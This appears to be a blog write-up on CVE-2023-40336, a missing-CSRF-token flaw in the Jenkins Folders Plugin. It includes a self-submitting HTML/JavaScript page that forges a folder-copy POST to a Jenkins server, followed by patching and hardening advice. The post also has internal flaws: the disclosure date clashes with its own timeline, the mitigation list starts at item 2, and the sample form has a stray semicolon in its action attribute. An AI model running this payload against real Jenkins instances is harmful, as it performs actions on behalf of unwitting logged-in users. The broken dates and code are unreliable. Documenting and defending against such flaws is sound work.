CVE-2023-40336 - How a Simple CSRF Bug in Jenkins Folders Plugin Lets Attackers Copy Your Folders

On August 23, 2023, a new vulnerability was disclosed affecting Jenkins, the popular open-source automation server. Registered as CVE-2023-40336, this security flaw exists in the Folders Plugin (version 6.846.v23698686ff6 and earlier) and lets attackers exploit Cross-Site Request Forgery (CSRF) to copy entire project folders without proper authorization. In this deep-dive, let’s break down how this CSRF bug works, walk through a sample exploit, and discuss how you can keep your Jenkins safe.

What is a CSRF Vulnerability?

CSRF lets bad actors trick authenticated users into performing requests they didn’t intend. In Jenkins, if you’re logged in and visit a malicious site, that site can make the Jenkins server process requests as if they were coming from you.

About the Jenkins Folders Plugin

The Folders Plugin helps Jenkins admins organize projects into folders. The plugin’s _folder copying_ feature is supposed to be protected from unauthorized use — but it turns out, that protection was missing!

Patch: Fixed in later versions. Upgrade recommended!

Here’s what was missing: critical CSRF protection (a security token or “crumb”) for the “Copy” folder action.

How Does The Exploit Work?

Suppose an admin (or anyone with permission) is logged into Jenkins. An attacker can trick them into visiting a malicious website. This site silently sends a crafted POST request to Jenkins _on their behalf_, causing a folder to be copied.

Example exploit using plain HTML and JavaScript:

<!-- Save this as exploit.html and host it somewhere -->
<html>
  <body>
    <h1>Attack in progress...</h1>
    <form id="csrf" action="https://your-jenkins-instance/job/important-folder/doCopy"; method="POST">
      <input type="hidden" name="name" value="copy-of-important-folder">
      <input type="hidden" name="Submit" value="OK">
    </form>
    <script>
      document.getElementById("csrf").submit();
    </script>
  </body>
</html>

> Note: Change your-jenkins-instance and important-folder to match your setup.

How it works:
The browser sends a POST to Jenkins to trigger a folder copy, _even though the user never meant to_; Jenkins fails to validate that this action was intentional (since no CSRF crumb/token is required).

References

- CVE-2023-40336 NVD entry
- Jenkins Security Advisory 2023-08-23
- Jenkins Folders Plugin

What’s The Real Danger?

This isn’t remote code execution, but attackers could use it together with other exploits (for example, copying and modifying jobs to escalate attacks, steal info, or disrupt workflows). Jenkins is often used in CI/CD pipelines, so unauthorized copying could have knock-on effects throughout an organization.

Update Now: Upgrade to Jenkins Folders Plugin version released after 6.846.v23698686ff6.

2. Restrict Access: Make sure your Jenkins isn’t internet-exposed or accessible to untrusted networks.
3. Review Security Settings: Enable CSRF crumb requirement for all actions. In Jenkins' global config, search for “Prevent Cross Site Request Forgery exploits”.

Wrap Up

CVE-2023-40336 highlights how even a single missing security check can undermine a strong system like Jenkins. If you use the Folders Plugin, update ASAP, check your logs for suspicious folder copies, and make sure CSRF protection is enforced everywhere.

Further Reading

- What is CSRF? (OWASP)
- Securing Jenkins


Credit:
This post is an original write-up based on public advisories and security best practices. Want more breakdowns like this? Leave a comment below!

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/22/2023 18:43:00 UTC